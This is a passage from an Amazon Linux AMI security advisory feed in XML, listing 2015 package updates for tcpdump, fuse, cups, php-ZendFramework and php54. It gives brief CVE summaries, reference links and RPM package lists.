</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3165" title="" id="CVE-2015-3165" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3166" title="" id="CVE-2015-3166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3167" title="" id="CVE-2015-3167" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1194.html" title="" id="RHSA-2015:1194" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-server" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-3.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-557</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-557: medium priority package update for tcpdump</title><issued date="2015-07-07 12:31:00" /><updated date="2015-07-07 22:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2154:
The osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value.
1201797:
CVE-2015-2154 tcpdump: ethernet printer osi_print_cksum() missing sanity checks out-of-bounds read
CVE-2015-0261:
Integer signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value.
1201792:
CVE-2015-0261 tcpdump: IPv6 mobility printer mobility_opt_print() typecastimg/signedness error
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0261" title="" id="CVE-2015-0261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2154" title="" id="CVE-2015-2154" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tcpdump-debuginfo" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686.rpm</filename></package><package name="tcpdump-debuginfo" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-558</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-558: medium priority package update for fuse</title><issued date="2015-07-07 12:33:00" /><updated date="2015-07-07 22:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3202:
It was discovered that fusermount failed to properly sanitize its environment before executing mount and umount commands. A local user could possibly use this flaw to escalate their privileges on the system.
1224103:
CVE-2015-3202 fuse: incorrect filtering of environment variables leading to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3202" title="" id="CVE-2015-3202" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fuse-devel" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-devel-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-debuginfo-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-libs-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-debuginfo-2.9.4-1.17.amzn1.i686.rpm</filename></package><package name="fuse-devel" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-devel-2.9.4-1.17.amzn1.i686.rpm</filename></package><package name="fuse" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-2.9.4-1.17.amzn1.i686.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-libs-2.9.4-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-559</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-559: medium priority package update for cups</title><issued date="2015-07-07 12:34:00" /><updated date="2015-07-07 22:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1159:
A cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.
CVE-2015-1158:
A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server
CVE-2014-9679:
An integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially-crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679" title="" id="CVE-2014-9679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158" title="" id="CVE-2015-1158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1159" title="" id="CVE-2015-1159" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1123.html" title="" id="RHSA-2015:1123" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-debuginfo" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-560</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-560: medium priority package update for php-ZendFramework</title><issued date="2015-07-07 12:35:00" /><updated date="2015-07-07 22:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3154:
1215712:
CVE-2015-3154 php-ZendFramework2: ZF2015-04: Potential header and mail injection vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3154" title="" id="CVE-2015-3154" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-extras" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.13-1.11.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-561</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-561: medium priority package update for php54</title><issued date="2015-07-07 12:39:00" /><updated date="2015-07-07 22:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4644:
1234940:
CVE-2015-4644 php: segmentation fault in php_pgsql_meta_data()
CVE-2015-4643:
1234938:
CVE-2015-4643 php: integer overflow in ftp_genlist() resulting in heap overflow (improved fix for CVE-2015-4022)
CVE-2015-4642:
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&O;&gt;O) in a CREATE TABLE statement.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
CVE-2014-3416:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3416" title="" id="CVE-2014-3416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642" title="" id="CVE-2015-4642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643" title="" id="CVE-2015-4643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644" title="" id="CVE-2015-4644" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-tidy" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.42-1.71.amzn1.i686.rpm</filename></package><package 